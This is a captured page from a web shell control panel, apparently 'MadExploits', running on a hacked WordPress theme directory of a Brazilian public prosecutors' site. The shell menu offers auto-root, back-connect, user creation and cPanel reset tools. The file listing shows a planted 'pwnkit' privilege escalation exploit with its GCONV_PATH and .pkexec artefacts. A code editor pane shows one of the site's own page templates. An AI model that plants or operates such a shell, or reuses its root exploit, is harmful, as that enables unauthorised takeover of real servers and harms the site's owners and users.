Linux 700ba4e1d92d 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 06:59:36 UTC 2025 x86_64
Apache/2.4.67 (Debian)
: 172.18.0.2 | : 216.73.217.30
Cant Read [ /etc/named.conf ]
8.2.31
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
wp-content /
themes /
mpcma-theme /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxrwxrwx
template-parts
[ DIR ]
drwxrwxrwx
.DS_Store
6
KB
-rwxrwxrwx
.mad-root
0
B
-rw-r--r--
archive-ato_normativo.php
12.96
KB
-rwxrwxrwx
archive-parecer.php
1.24
KB
-rwxrwxrwx
footer.php
3.58
KB
-rwxrwxrwx
front-page.php
7.12
KB
-rwxrwxrwx
functions.php
9.54
KB
-rwxrwxrwx
header.php
2.19
KB
-rwxrwxrwx
home.php
1.27
KB
-rwxrwxrwx
index.php
7.07
KB
-rwxrwxrwx
page-acesso-a-informacao.php
3.61
KB
-rwxrwxrwx
page-contato.php
3.53
KB
-rwxrwxrwx
page-institucional.php
3.79
KB
-rwxrwxrwx
page-mapa-do-site.php
2.51
KB
-rwxrwxrwx
page.php
693
B
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
screenshot-readme.txt
73
B
-rwxrwxrwx
single.php
876
B
-rwxrwxrwx
style.css
499
B
-rwxrwxrwx
taxonomy-tipo_ato.php
2.64
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : page-institucional.php
<?php /** * Template Name: Institucional */ get_header(); ?> <div class="page-hero"> <h1>Institucional</h1> <p class="breadcrumb"><a href="<?php echo home_url(); ?>">Início</a> › Institucional</p> </div> <div class="page-content"> <div class="section-page-header"> <svg viewBox="0 0 24 24"><path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm-2 15l-5-5 1.41-1.41L10 14.17l7.59-7.59L19 8l-9 9z"/></svg> <h2>SOBRE O MPC-MA</h2> </div> <?php if ( have_posts() ) : while ( have_posts() ) : the_post(); ?> <div class="sobre-texto"> <?php the_content(); ?> </div> <?php endwhile; else : ?> <div class="sobre-texto"> <p>O Ministério Público de Contas do Estado do Maranhão (MPC-MA) é órgão essencial ao exercício do controle externo da administração pública, atuando junto ao Tribunal de Contas do Estado do Maranhão (TCE-MA). Sua missão é zelar pela correta aplicação dos recursos públicos, pela legalidade dos atos administrativos e pela defesa da ordem jurídica, do regime democrático e dos interesses sociais.</p> <p>Dotado de independência funcional, o MPC-MA manifesta-se nos processos de controle externo por meio de pareceres e outras manifestações técnicas, contribuindo para a tomada de decisões do TCE-MA com base na legalidade, eficiência e responsabilidade na gestão pública.</p> <p>Além de sua atuação processual, o MPC-MA desempenha papel relevante na promoção da transparência, do controle social e do aperfeiçoamento da administração pública, fortalecendo os mecanismos institucionais de fiscalização e incentivando boas práticas de governança.</p> </div> <?php endif; ?> <!-- MEMBROS --> <div class="section-title" style="margin-top:48px;"> <svg viewBox="0 0 24 24"><path d="M12 12c2.21 0 4-1.79 4-4s-1.79-4-4-4-4 1.79-4 4 1.79 4 4 4zm0 2c-2.67 0-8 1.34-8 4v2h16v-2c0-2.66-5.33-4-8-4z"/></svg> MEMBROS DO MPC-MA </div> <div class="membros-grid" style="justify-content:flex-start;gap:40px;margin-top:24px;"> <?php $membros = new WP_Query([ 'post_type' => 'membro', 'posts_per_page' => 10, 'orderby' => 'menu_order', 'order' => 'ASC', ]); if ( $membros->have_posts() ) : while ( $membros->have_posts() ) : $membros->the_post(); $cargo = get_post_meta( get_the_ID(), 'cargo', true ); ?> <div class="membro"> <div class="membro-foto <?php echo !has_post_thumbnail() ? 'placeholder' : ''; ?>" style="width:100px;height:100px;"> <?php if ( has_post_thumbnail() ) : ?> <?php the_post_thumbnail('thumbnail', ['alt' => get_the_title()]); ?> <?php else : ?> <svg viewBox="0 0 24 24"><path d="M12 12c2.21 0 4-1.79 4-4s-1.79-4-4-4-4 1.79-4 4 1.79 4 4 4zm0 2c-2.67 0-8 1.34-8 4v2h16v-2c0-2.66-5.33-4-8-4z"/></svg> <?php endif; ?> </div> <h4 style="margin-top:12px;"><?php the_title(); ?></h4> <span><?php echo esc_html($cargo); ?></span> </div> <?php endwhile; wp_reset_postdata(); else : $placeholders = [ ['DOUGLAS PAULO DA SILVA', 'Procurador-Geral'], ['JAIRO CAVALCANTI VIEIRA', 'Procurador'], ['PAULO HENRIQUE ARAÚJO DOS REIS', 'Procurador'], ]; foreach ($placeholders as $m) : ?> <div class="membro"> <div class="membro-foto placeholder" style="width:100px;height:100px;"> <svg viewBox="0 0 24 24"><path d="M12 12c2.21 0 4-1.79 4-4s-1.79-4-4-4-4 1.79-4 4 1.79 4 4 4zm0 2c-2.67 0-8 1.34-8 4v2h16v-2c0-2.66-5.33-4-8-4z"/></svg> </div> <h4 style="margin-top:12px;"><?php echo esc_html($m[0]); ?></h4> <span><?php echo esc_html($m[1]); ?></span> </div> <?php endforeach; endif; ?> </div> </div> <?php get_footer(); ?>
Close